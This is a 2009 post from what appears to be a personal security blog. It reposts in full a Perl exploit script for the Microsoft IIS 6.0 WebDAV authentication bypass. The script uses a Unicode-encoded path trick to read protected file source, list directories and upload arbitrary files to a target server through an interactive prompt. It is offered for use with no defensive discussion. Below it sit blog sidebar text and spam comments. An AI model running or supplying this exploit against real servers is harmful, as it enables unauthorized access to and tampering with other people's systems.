IIS 6.0 Webdav Exploit
30 May 2009There is an exploit for IIS 6.0 Webdav Remote Authentification Bypass bug wrote in Perl.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 | #!/usr/bin/perl -W # # Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit # written by ka0x <ka0x01[alt+64]gmail.com> # # Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others! use IO::Socket ; my ( $host, $path ) = @ARGV ; my $port = 80 ; # webserver port &usage unless $ARGV[1] ; $host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ; $path =~ s/\/// if(substr($path, 0,1) eq '/'); sub _file { $file = shift ; open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ; while( <FILE> ){ $cont .= $_ ; } close(FILE) ; return $cont ; } print "write 'help' for get help list\n"; while( 1 ) { my $sock = IO::Socket::INET->new (PeerAddr => $host, PeerPort => $port, Proto => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ; print "\$> "; chomp( my $option = <STDIN> ) ; last if $option eq 'quit' ; if($option eq 'source') { $path =~ s/\//%c0%af\// ; print $sock "GET /".$path." HTTP/1.1\r\n" ; print $sock "Translate: f\r\n" ; print $sock "Host: ".$host."\r\n" ; print $sock "Connection: close\r\n\r\n" ; while(<$sock>){ print $_ ; } close($sock) ; } elsif($option eq 'path') { $path =~ s/\//%c0%af\// ; print $sock "PROPFIND /".$path." HTTP/1.1\r\n" ; print $sock "Host: ".$host."\r\n" ; print $sock "Connection:close\r\n" ; print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ; print $sock "Content-Length: 0\r\n\r\n" ; print $sock '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ; while(<$sock>){ print $_ ; } close($sock) ; } elsif($option eq 'put') { $path =~ s/\//%c0%af\// ; print "[*] Insert a local file (ex: /root/file.txt): " ; chomp( $local = <STDIN> ) ; $file_l = _file( $local ) ; print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ; print $sock "Host: ".$host."\r\n" ; print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ; print $sock "Connection:close\r\n" ; print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ; print $sock $file_l,"\r\n" ; while(<$sock>){ print $_ ; } close($sock) ; } elsif($option eq 'help') { print "\n\t\t- OPTIONS -\n\n\n" ; print "\thelp\t\tgive this help list\n" ; print "\tsource\t\tget file content\n" ; print "\tpath\t\tget directory contents\n" ; print "\tput\t\tput file\n" ; print "\tquit\t\texit exploit\n\n" ; } } sub usage { print << 'EOH' ; $ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit $ written by ka0x <ka0x01[at]gmail.com> $ 25/05/2009 usage: perl $0 <host> <path> example: perl $0 localhost dir/ perl $0 localhost dir/file.txt EOH exit; } |
- Tags: authentification bypass, exploit, iis 6.0, webdav
Comment Form
About this blog
This blog is made by Muhammad Baiquni, dedicated to give all of you information about Computer, Security, Ebook reviews, Software, Tutorial, Web: HTML, PHP, MySQL, CSS, and more of million information.
If you like, please bookmark this web or feed us for be the first one get our newest information.
Photostream
Categories
- Computer Security (6)
- Ebooks Review (1)
- Information (6)
- Software (2)
- Web (6)
- SiR.BlaCk: Hey How To Extract This tar file on ma website ? [...]
- buying generic cialis: Thank you! You often write very interesting articles. You improved my mood. [...]
- Cornelius: I really like your blog and i respect your work. I'll be a frequent visitor. [...]
- www.fachrulfikri.com: nice tutor.. [...]
- Denim Skirt Upskirts: any more posts coming ? [...]
1 Response to IIS 6.0 Webdav Exploit
Hack
June 10th, 2009 at 8:21 pm
walah gak ngerti aku ben